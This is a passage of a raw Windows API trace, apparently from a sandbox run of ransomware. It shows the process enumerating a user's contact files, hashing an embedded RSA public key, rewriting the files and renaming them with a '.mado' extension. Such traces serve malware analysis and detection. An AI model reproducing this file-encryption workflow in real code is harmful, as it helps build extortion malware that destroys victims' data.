lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0203.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b80690 [0203.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0203.621] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0203.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.621] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.621] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.621] CloseHandle (hObject=0x63c) returned 1 [0203.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b80690 [0203.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.622] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.mado")) returned 1 [0203.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.623] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.624] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0203.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.624] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned=".contact" [0203.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.626] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=1177) returned 1 [0203.626] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.628] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x473, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.628] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.630] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.630] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x499, lpOverlapped=0x0) returned 1 [0203.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.630] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.631] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.631] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.631] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.631] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.631] GetLastError () returned 0x0 [0203.631] SetLastError (dwErrCode=0x0) [0203.631] GetLastError () returned 0x0 [0203.631] SetLastError (dwErrCode=0x0) [0203.631] GetLastError () returned 0x0 [0203.631] SetLastError (dwErrCode=0x0) [0203.631] GetLastError () returned 0x0 [0203.631] SetLastError (dwErrCode=0x0) [0203.631] GetLastError () returned 0x0 [0203.631] SetLastError (dwErrCode=0x0) [0203.631] GetLastError () returned 0x0 [0203.631] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.632] GetLastError () returned 0x0 [0203.632] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] GetLastError () returned 0x0 [0203.633] SetLastError (dwErrCode=0x0) [0203.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.633] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.633] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.634] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.634] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.634] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4a0) returned 0x3310808 [0203.634] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310cb0 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x329bf8 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc98 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x305cd0 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcb0 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd88 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdce0 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3294350 [0203.634] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x3b80690 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b808b0 [0203.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd88 | out: hHeap=0x2c0000) returned 1 [0203.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdce0 | out: hHeap=0x2c0000) returned 1 [0203.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b808b0 | out: hHeap=0x2c0000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdce0 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdd88 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x32b69d8 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b67078 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdce0 | out: hHeap=0x2c0000) returned 1 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd88 | out: hHeap=0x2c0000) returned 1 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.635] GetCurrentThreadId () returned 0x600 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66078 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x323430 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66498 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.636] GetCurrentThreadId () returned 0x600 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66390 [0203.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66288 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd88 [0203.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdce0 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc68 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd88 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd88 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b67190 [0203.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b80690 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0203.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x32b69d8 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0203.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b672a8 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd88 | out: hHeap=0x2c0000) returned 1 [0203.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b808a8 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67190 | out: hHeap=0x2c0000) returned 1 [0203.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66180 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66390 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66180 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b672a8 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: 